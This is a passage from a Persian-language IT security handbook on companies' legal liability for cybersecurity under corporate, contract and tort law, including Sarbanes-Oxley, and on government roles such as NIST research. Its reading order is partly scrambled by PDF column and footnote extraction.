‫ﻣﻮﺿــﻮﻋﺎﺗﻲ ﭼــﻮﻥ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻧﻴــﺰ ﻣــﻲﺷــﻮﺩ‪ .‬ﺑﺮﺧــﻲ‬
‫ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻣﺘﺬﻛﺮ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺍﮔﺮ ﻣﺪﻳﺮﺍﻥ ﺍﺯ ﺑﺮﺩﺍﺷﺘﻦ ﮔﺎﻣﻬﺎﻱ‬
‫ﻣﻨﺎﺳــﺐ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﻬﺪﻳــﺪﺍﺕ ﺍﻣﻨﻴﺘــﻲ ﺧــﻮﺩﺩﺍﺭﻱ ﻛﻨﻨــﺪ‪،‬‬
‫ﺩﺭﺻﻮﺭﺕ ﻣﺘﻀﺮﺭ ﺷﺪﻥ‪ ،‬ﺩﺭ ﻗﺒﺎﻝ ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺷـﺮﻛﺖ‪ ،‬ﻣـﺴﺌﻮﻝ‬
‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻳﻦ ﻧﻮﻉ ﻭﻇﺎﻳﻒ ﻛﻪ ﺑﺮﺧﺎﺳﺘﻪ ﺍﺯ ﻗـﻮﺍﻧﻴﻦ ﻋـﺎﻡ‬
‫ﺷﺮﻛﺘﻬﺎ ﻫﺴﺘﻨﺪ ﺑﺎ ﺗﺼﻮﻳﺐ ﻗـﻮﺍﻧﻴﻦ ﻛﻴﻔـﺮﻱ ﺗﻘﻮﻳـﺖ ﺷـﺪﻩﺍﻧـﺪ‪.‬‬
‫ﻗـــﺎﻧﻮﻥ ‪) Sarbanes-Oxley‬ﻣـــﺼﻮﺏ ﺳـــﺎﻝ ‪ ،(۲۰۰۲‬ﭼﻨـــﺪ‬
‫ﻧﻴﺎﺯﻣﻨــﺪﻱ ﺟﺪﻳــﺪ ﺑــﻪ ﺷــﺮﻛﺘﻬﺎ ﺗﺤﻤﻴــﻞ ﻛــﺮﺩ ﻭ ﺑــﺎ ﺍﻋــﻼﻡ‬
‫ﺭﺳــﻮﺍﻳﻲﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﻣﻘﻴــﺎﺱ ﻭﺳــﻴﻊ ﺗﻮﺟــﻪ ﻫﻤﮕــﺎﻥ ﺭﺍ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧـﻮﺩ‬
‫ﺍﻧﮕﻴﺰﺓ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻨﺎﻓﻊ ﺁﻧﻬﺎ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻚ ﺷﺮﻛﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺸﻜﻼﺕ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‬
‫ﺍﺯ ﺧﻮﺩ ﻣﺤﻔﺎﻇﺖ ﻧﻜﻨﺪ‪ ،‬ﺯﻳﺎﻧﻬﺎﻱ ﺣﺎﺻـﻠﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﻣﻨـﺎﻓﻊ ﺁﻧـﺮﺍ‬
‫ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻣﻨﺠﺮ‬
‫ﺑﻪ ﺗﻮﻗﻒ ﻓﻌﺎﻟﻴﺖ ﺗﺠﺎﺭﻱ ﻳﻚ ﺷﺮﻛﺖ ﻭ ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﺍﻋﺘﺒـﺎﺭ‬
‫ﺁﻥ ﮔﺮﺩﻧﺪ‪ .‬ﺣﻤﻠﻪ ﺑـﻪ ﺷـﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺷـﺮﻛﺖ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻋﻤﻠﻴﺎﺕ ﺁﻧﺮﺍ ﻣﺘﻮﻗﻒ ﻧﻤﺎﻳﺪ ﻭ ﺑﺎﻋﺚ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎ ﺍﺳﺮﺍﺭ ﺗﺠﺎﺭﻱ ﺷﻮﺩ‪ .‬ﻫﺮ ﺷـﺮﻛﺘﻲ ﻛـﻪ ﺑـﻪ‬
‫ﺍﻣﻨﻴﺖ ﺗﻮﺟﻪ ﻻﺯﻡ ﺭﺍ ﺍﺧﺘﺼﺎﺹ ﻧﺪﺍﺩﻩ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻤـﺎﻣﻲ‬
‫ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻗﺒﺎﻳﻲ ﻭﺍﮔﺬﺍﺭ ﻧﻤﺎﻳﺪ ﻛﻪ ﺑـﻪ ﺍﻣﻨﻴـﺖ ﺗﻮﺟـﻪ‬
‫ﻛﺎﻓﻲ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺳـﺎﺯﻧﺪﮔﺎﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ‬
‫ﻣﺤﺼﻮﻻﺕ ﻧﺎﺍﻣﻦ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﺴﺮﻋﺖ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ‪.‬‬
‫ﻣﻮﺭﺩﻱ‪ ،‬ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺎﻧﻮﻧﻤﻨﺪ ﺗﺠﺎﺭﺕ ﺳـﻨﺘﻲ ﺭﺍ‬
‫ﺑﺮ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺍﻋﻤﺎﻝ ﻛﻨﻨـﺪ‪ .‬ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ‬
‫ﺳﻴﺴﺘﻢ ﻗﻀﺎﻳﻲ ﺁﻧﻬﺎ ﺑﻪ ﻗﺎﺿﻲ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻣﻔـﺎﻫﻴﻢ ﻛﻠـﻲ‬
‫ﻗﺎﻧﻮﻥ ﺭﺍ ﻃﺒﻖ ﺷﺮﺍﻳﻂ ﺟﺪﻳﺪ ﺗﻔﺴﻴﺮ ﻛﻨﺪ‪ ،‬ﻗﻀﺎﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ‬
‫ﺣﻞ ﻣﺴﺎﺋﻞ ﻭ ﻣﺸﻜﻼﺕ ﺣﻘﻮﻗﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ‬
‫ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻔﺎﻫﻴﻢ ﻗﺎﻧﻮﻧﻲ ﺳﻨﺘﻲ )ﻫﻤﭽﻮﻥ ﺳﻬﻞﺍﻧﮕـﺎﺭﻱ‬
‫ﻳﺎ ﻋﺪﻡ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻒ ﻣﺤﻮﻟﻪ ﺩﺭ ﻗﺮﺍﺭﺩﺍﺩ( ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺍﺳﺖ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٤٤‬‬
‫ﺑﺮﺍﻧﮕﻴﺨﺖ‪ .‬ﻛﻨﮕﺮﻩ ﺗﺼﻮﻳﺐ ﻛﺮﺩ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺮﺍﻱ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺎﻟﻲ ﺷﺮﻛﺘﻬﺎ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﻛﻨﮕﺮﻩ ﻫﻤﭽﻨﻴﻦ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺭﺍ ﻧﻴـﺰ‬
‫ﺍﻟﺰﺍﻣﻲ ﺩﺍﻧﺴﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻃﺒﻖ ﻗﺎﻧﻮﻥ ﻋﺎﻡ ﺷﺮﻛﺘﻬﺎ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺗﺠﺎﺭﻱ ﻋﻤـﻮﻣﻲ ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﻏﻴﺮﻭﺍﺑـﺴﺘﻪ ﺗﺤـﺖ‬
‫ﺣﺴﺎﺑﺮﺳﻲ ﻣﺎﻟﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﻣﺘﻮﺟـﻪ‬
‫ﺷﻮﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﻨﺎﺩ ﻣﺎﻟﻲ ﺷﺮﻛﺖ ﺭﺍ ﺗﻬﺪﻳﺪ‬
‫ﻣﻲﻛﻨﻨـﺪ‪ ،‬ﺷﺎﺧـﺼﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﻧﻴـﺰ ﺑـﻪ ﺣﻴﻄـﺔ‬
‫ﺣﺴﺎﺑﺮﺳﻲ ﺧﻮﺩ ﺍﺿﺎﻓﻪ ﻣﻲﺳﺎﺯﻧﺪ‪ .‬ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ‪،‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﺍﻳﺠـﺎﺩ‬
‫ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭﺩﺍﺩ‬
‫ﻃﺒــﻖ ﻗــﺎﻧﻮﻥ ﻗــﺮﺍﺭﺩﺍﺩ‪ ،‬ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳــﺪ ﻣــﺴﺌﻮﻟﻴﺖ ﺩﺳﺘﺮﺳــﻲ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻳﺎ ﺁﺳﻴﺐ ﻧﺎﺷﻲ ﺍﺯ ﻧﻘـﺎﺋﺺ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ‪ .‬ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ‪ ،‬ﺷﺮﻛﺘﻲ‬
‫ﻛﻪ ﺩﺭ ﻣﺘﻮﻥ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋﻼﻡ ﻣﻲﺩﺍﺭﺩ "ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻳﻤـﻦ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ"‪ ،‬ﺍﻳﻨﮕﻮﻧﻪ ﻓﺮﺽ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑـﺎ ﻣـﺸﺘﺮﻱ ﺧـﻮﺩ‬
‫ﻭﺍﺭﺩ ﻳﻚ ﺗﻮﺍﻓﻖ ﺩﻭﻃﺮﻓﻪ ﺷﺪﻩ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻣﻮﻇﻒ ﺑﻪ ﺗﻌﺎﻣﻞ ﺑـﺎ‬
‫ﻣــﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﺤﻴﻄــﻲ ﺍﻣــﻦ ﻣــﻲﺑﺎﺷــﺪ‪ .‬ﺩﺭ ﭼﻨــﻴﻦ ﺣــﺎﻟﺘﻲ‪،‬‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻱ ﺑﺎ ﺣﻤـﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑﻪ ﺧﻄﺮ ﺑﻴﺎﻓﺘﺪ ﻣﺸﺘﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺩﻋـﺎﻱ ﻧﻘـﺾ ﺗﻌﻬـﺪﺍﺕ ﻛﻨـﺪ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭﺏ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨـﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺣﺴﺐ ﻗﺮﺍﺭﺩﺍﺩ‪ ،‬ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ‬
‫ﺧﺪﻣﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻧﻴـﺰ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺍﺛﺮ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ٦٩‬ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﻭ ﺍﺭﺍﺋﻪ‬
‫ﺳﺮﻭﻳﺲ ﺑﺎﺯ ﺑﻤﺎﻧﺪ‪ ،‬ﺷﺮﻛﺖ ﺩﺭ ﻣﻌﺮﺽ ﺍﺩﻋـﺎﻱ ﻧﻘـﺾ ﺗﻌﻬـﺪﺍﺕ‬
‫ﺗﻮﺳﻂ ﻣﺸﺘﺮﻳﺎﻥ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤﺪﻱ‬
‫ﺍﺯ ﻧﻈﺮ ﺣﻘﻮﻗﻲ‪ ،‬ﻣﻔﻬﻮﻡ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤﺪﻱ )ﻣﺴﺌﻮﻟﻴﺖ ﻣﺪﻧﻲ ﺩﺭ ﻗﺒـﺎﻝ‬
‫ﺧﺴﺎﺭﺗﻬﺎﻱ ﺳﻬﻮﻱ( ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺁﺳﻴﺒﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜـﺎﺭ‬
‫ﻣﻲﺭﻭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻗﺎﻧﻮﻥ ﺳﻨﺘﻲ ﺟﺮﺍﺋﻢ ﺑﺮﺍﻱ‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺷـﺮﻛﺖ ﺍﻗـﺪﺍﻣﺎﺕ ﻣﻨﻄﻘـﻲ ﺑـﺮﺍﻱ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ‬
‫ﭘﻴﺶ ﻧﮕﻴﺮﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﻑ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺑـﺎ ﺍﺩﻋـﺎﻱ‬
‫‪Denial of Service‬‬
‫‪69‬‬
‫ﻧﻘﺾ ﺗﻌﻬﺪﺍﺕ ﺭﻭﺑﺮﻭ ﺷﻮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺭﺍﻳﺎﻧـﻪ ﻫـﺎﻱ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﻳـﻚ ﻣﻘـﺼﺪ ﺛﺎﻟـﺚ ﺑﻜـﺎﺭ‬
‫ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺆﺛﺮ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻧﺠﺎﻡ ﻧﺸﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﻛﺖ ﻣﻴـﺎﻧﻲ‬
‫ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﺷﻮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺣﻤﻠﻪ ﺍﻱ ﺗﻮﺳﻂ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ‬
‫ﺷﺮﻛﺖ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ ﻗﺮﺑﺎﻧﻴﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎ ﺍﺛﺒـﺎﺕ ﺍﻳـﻦ‬
‫ﻣﻮﺿﻮﻉ ﺷﺮﻛﺖ ﺭﺍ ﻣﺘﻬﻢ ﺑﻪ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻦ ﺿﻮﺍﺑﻂ ﻭ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﻻﺯﻡ ﺍﺳﺘﺨﺪﺍﻣﻲ ﻳﺎ ﻧﻈﺎﺭﺗﻲ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺣﺘﻲ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫـﻢ ‪ -‬ﻛـﻪ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ‬
‫ﻣﻮﺍﺭﺩ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤـﺪﻱ ﻣﻮﺟـﻮﺩ ﻫـﺴﺘﻨﺪ ‪ -‬ﺍﻳـﻦ ﻧـﻮﻉ‬
‫ﻗﻮﺍﻧﻴﻦ ﭼﻨﺪﺍﻥ ﺗﻬﻴﻪ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﺗﺎﻛﻨﻮﻥ ﺩﺍﺩﮔﺎﻫﻬﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻣﻨﻴﺖ‬
‫ﺷﺒﻜﻪ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻭﻇﻴﻔﺔ ﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﻧﻨﻤﻮﺩﻩ ﺍﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ‬
‫ﺷــﺎﻳﺪ ﺗﻨﻬــﺎ ﮔﺬﺷــﺖ ﺯﻣــﺎﻥ ﺑﺘﻮﺍﻧــﺪ ﺗﺌﻮﺭﻳﻬــﺎﻱ ﻗــﺪﻳﻤﻲ‬
‫ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻨـﺪ‪ .‬ﺩﺭ‬
‫ﺁﻥ ﺯﻣﺎﻥ ﺩﺍﺩﮔﺎﻫﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ‬
‫ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﻭ ﺟﺎﻣﻌﺔ ﺗﺠـﺎﺭﻱ ﺩﺭﻳﺎﺑﻨـﺪ‪ ،‬ﻭ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳـﻂ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺧـﻮﺩ‪-‬ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ‬
‫ﺍﺻﻼﺡ ﺷﻮﻧﺪ‪.‬‬
‫‪٢٤٥‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺑﻬـﺮﻩ ﻭﺭﻱ‪ ،‬ﺗـﺴﻬﻴﻞ ﺗﺠـﺎﺭﺕ‪ ،‬ﻭ ﺑﻬﺒـﻮﺩ ﻛﻴﻔﻴـﺖ‬
‫ﺯﻧﺪﮔﻲ ﺍﺳﺖ‪.‬‬
‫ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ‪ NIST‬ﺑــﺮﺍﻱ ﺍﺭﺗﻘــﺎﻱ ﺍﻣﻨﻴــﺖ ﻳــﻚ‬
‫ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺗﻲ ﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺯﻳﺮ ﻣﻲﭘﺮﺩﺍﺯﺩ‪:‬‬
‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ‬
‫ﻧﻘﺸﻬﺎﻱ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟﺖ‬
‫ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑـﺮ ﺍﻣﻨﻴـﺖ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ‬
‫ﻫﻤﻪ ﺍﺯ ﻧﻮﻉ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻛﻪ ﺷـﺎﻳﺪ‬
‫ﺗﺄﺛﻴﺮ ﺑﻴﺸﺘﺮﻱ ﻫﻢ ﺩﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺗﺤﻘﻴﻖ ‪ -‬ﻳﻜﻲ ﺍﺯ ﻧﻘـﺸﻬﺎﻱ ﻣﻬـﻢ ﺩﻭﻟـﺖ‪ ،‬ﺗـﺄﻣﻴﻦ ﺳـﺮﻣﺎﻳﻪ ﻭ‬
‫ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑـﺎﺭﻩ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺍﺳـﺖ‪ .‬ﻣﺆﺳـﺴﻪ ﻣﻠـﻲ‬
‫ﺍﺳــﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨــﺎﻭﺭﻱ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ )‪ ٧١(NIST‬ﺳــﺎﺯﻣﺎﻥ‬
‫ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟـﺖ ﺩﺭ ﻭﺯﺍﺭﺕ ﺑﺎﺯﺭﮔـﺎﻧﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﻣﺄﻣﻮﺭﻳﺖ ‪ NIST‬ﺗﻬﻴﻪ ﻭ ﺍﺭﺗﻘﺎﻱ ﻣﻌﻴﺎﺭﻫﺎ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻓﻨﺎﻭﺭﻱ‬
‫‪and‬‬
‫‪Standards‬‬
‫‪Data Protection Directive‬‬
‫‪National‬‬
‫‪Institute‬‬
‫‪of‬‬
‫‪Technology‬‬
‫‪70‬‬
‫‪71‬‬
‫•‬
‫ﺗﺤﻘﻴﻖ‪ ،‬ﻣﻄﺎﻟﻌﻪ ﻭ ﺍﺭﺍﺋﻪ ﺗﻮﺻـﻴﻪ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ‬
‫ﻣﻌﺮﺽ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ؛‬
‫•‬
‫ﺍﻳﺠﺎﺩ ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺣﺴﺎﺱ ﺩﻭﻟﺖ؛‬
‫•‬
